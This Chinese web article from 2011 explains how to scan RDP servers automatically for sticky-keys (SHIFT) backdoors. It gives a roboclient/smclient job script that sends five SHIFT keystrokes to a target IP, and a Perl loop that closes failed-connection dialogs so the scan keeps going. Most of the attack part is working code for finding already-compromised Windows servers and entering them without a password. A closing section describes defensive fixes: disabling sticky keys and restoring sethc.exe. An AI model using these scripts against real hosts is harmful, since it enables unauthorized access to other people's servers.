3389遠(yuǎn)程終端的SHIFT后門自動(dòng)掃描[自動(dòng)關(guān)閉錯(cuò)誤連接]

發(fā)布時(shí)間：2011-01-15 23:03:17 作者：佚名

首先3389的SHIFT后門極少其次大部分SHIFT后門都加密所以手工一個(gè)一個(gè)嘗試是挺傻的，寫成自動(dòng)掃描的話，還能讓人忍受

首先3389的SHIFT后門極少
其次大部分SHIFT后門都加密

所以手工一個(gè)一個(gè)嘗試是挺傻的，寫成自動(dòng)掃描的話，還能讓人忍受
需要用到的工具 roboclient
smclient -f:shift_backdoor.txt -s:125.91.15.254 -l:1 -v -d

shift_backdoor.txt：

job
{
connect("","","",1,1);
sleep(2000);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
sleep(2000);
disconnect();
}

有些SHIFT后門被改成了按7次SHIFT，或者是WIN+U后門，改改shift_backdoor.txt把功能加進(jìn)去即可

自動(dòng)關(guān)閉錯(cuò)誤連接

復(fù)制代碼

代碼如下:

#!/usr/bin/perl
use warnings;
use Win32::GUI;
use constant WM_CLOSE => 16;
sub monitor {
my $handle = Win32::GUI::FindWindow('', '中斷遠(yuǎn)程桌面連接');
Win32::GUI::SendMessage($handle, WM_CLOSE, 0, 0);
}
sub monitor1 {
my $handle = Win32::GUI::FindWindow('', '斷開 Windows 會(huì)話');
Win32::GUI::SendMessage($handle, WM_CLOSE, 0, 0);
}
while(1){
&monitor;
&monitor1;
sleep(2);
}

shift后門的解決辦法
一日在網(wǎng)上看到了shift后門，說是按5下shift鍵服務(wù)器的系統(tǒng)盤就蹦出來了，不用輸入密碼！我一看，就懷著好奇的想法試了下果真如此，難怪我們的服務(wù)器總是出問題，查了下解決辦法現(xiàn)在發(fā)出來，希望和我一樣的菜鳥X級網(wǎng)管能有用。
打開控制面板－－輔助功能選項(xiàng)－－粘滯鍵－－設(shè)置－－去掉使用快捷鍵的勾

還有要改下copy.exe的權(quán)限，不過在這里推薦大家把c盤所有的程序都改下，只有administrator才能訪問

shift后門的預(yù)防解決辦法：預(yù)防很簡單的，連敲5次shift，然后在彈出的設(shè)置里面取消連滯鍵
已經(jīng)中了的話
attrib c:\windows\system32\sethc.exe -h
attrib c:\windows\system32\dllcache\sethc.exe -h
拷貝新的 c:\windows\system32\sethc.exe 文件到 c:\windows\system32\目錄下；拷貝新的c:\windows\system32\dllcache\sethc.exe到c:\windows\system32\dllcache\目錄下
收工！

Tag：SHIFT后門自動(dòng)掃描

相關(guān)文章

封UDP的服務(wù)器真的打不了么？封UDP、封海外服務(wù)器
很多游戲服務(wù)器租用的時(shí)候會(huì)出現(xiàn)一些封UDP的字眼，網(wǎng)上一些文章也說UDP協(xié)議不可靠！為什么要封UDP呢？既然不可靠，為什么有些人還要使用它呢？今天與你們分享一下UDP，希望
2024-05-07
魔獸世界服務(wù)器被DDoS攻擊怎么辦？DDoS攻擊防御方法
魔獸世界服務(wù)器被攻擊在目前來說也是比較常見的，同行競爭激烈，在官服開放時(shí)也遇到過DDOS攻擊，要是飛飛沒記錯(cuò)是在22年9月14日，從剛開始的身份驗(yàn)證服務(wù)器出現(xiàn)問題，到確
2023-07-17
分享五大免費(fèi)企業(yè)網(wǎng)絡(luò)入侵檢測（IDS）工具
這篇文章主要分享一下五大免費(fèi)企業(yè)網(wǎng)絡(luò)入侵檢測（IDS）工具，當(dāng)前企業(yè)對于網(wǎng)絡(luò)安全越來越重視，那么后期可能就需要大家多多關(guān)注一些安全工具的使用于檢測
2019-12-01
網(wǎng)絡(luò)安全基礎(chǔ)之網(wǎng)絡(luò)協(xié)議與安全威脅的關(guān)系介紹
網(wǎng)絡(luò)協(xié)議是什么呢？網(wǎng)絡(luò)協(xié)議是網(wǎng)絡(luò)中計(jì)算機(jī)或設(shè)備之間進(jìn)行通信的一系列規(guī)則集合。本文中小編介紹的是網(wǎng)絡(luò)協(xié)議和安全威脅的關(guān)系，需要的朋友不妨閱讀本文了解一下
2019-04-02
DDoS攻擊原理是什么?DDoS攻擊原理及防護(hù)措施介紹
DDoS攻擊是由DoS攻擊轉(zhuǎn)化的，這項(xiàng)攻擊的原理以及表現(xiàn)形式是怎樣的呢？要如何的進(jìn)行防御呢？本文中將會(huì)有詳細(xì)的介紹，需要的朋友不妨閱讀本文進(jìn)行參考
2019-01-15
基于Web攻擊的方式發(fā)現(xiàn)并攻擊物聯(lián)網(wǎng)設(shè)備介紹
本文中介紹的是基于Web攻擊的方式發(fā)現(xiàn)并攻擊物聯(lián)網(wǎng)設(shè)備，感興趣的朋友不妨閱讀本文進(jìn)行了解
2019-01-11
為何黑客要挾制路由器DNS 用戶該怎樣實(shí)時(shí)發(fā)覺和防備方法
起首說說挾制路由器是什么意思，路由器挾制平日指的是，開啟了無線網(wǎng)絡(luò)功效的無線路由器，攻擊者經(jīng)由過程破解無線暗碼銜接上無線網(wǎng)后，再登錄路由治理界面來節(jié)制全部無線網(wǎng)
2018-05-16
大勢至共享文件監(jiān)控軟件、共享文件權(quán)限管理軟件主控端與客戶端的連接設(shè)
這篇文章主要介紹了大勢至共享文件監(jiān)控軟件、共享文件權(quán)限管理軟件主控端與客戶端的連接設(shè)置方法詳解，，小編覺得還是挺不錯(cuò)的，具有一定借鑒價(jià)值，下面就來和小編一起看看
2018-01-25
詳細(xì)介紹sd卡加密軟件的選擇以及給sd卡設(shè)置密碼、給sd卡加密
這篇文章主要介紹了詳細(xì)介紹sd卡加密軟件的選擇以及給sd卡設(shè)置密碼、給sd卡加密，如何保護(hù)sd卡文件的安全，如何給SD卡設(shè)置密碼、如何給SD卡加密，下面就跟小編一起來看看吧
2018-01-19
server2008共享設(shè)置、服務(wù)器共享文件設(shè)置、服務(wù)器設(shè)置共享文件夾的方法
這篇文章主要介紹了server2008共享設(shè)置、服務(wù)器共享文件設(shè)置、服務(wù)器設(shè)置共享文件夾的方法詳細(xì)介紹，保護(hù)服務(wù)器共享文件設(shè)置訪問權(quán)限，讓每個(gè)部門只訪問自己的共享文件等，
2018-01-19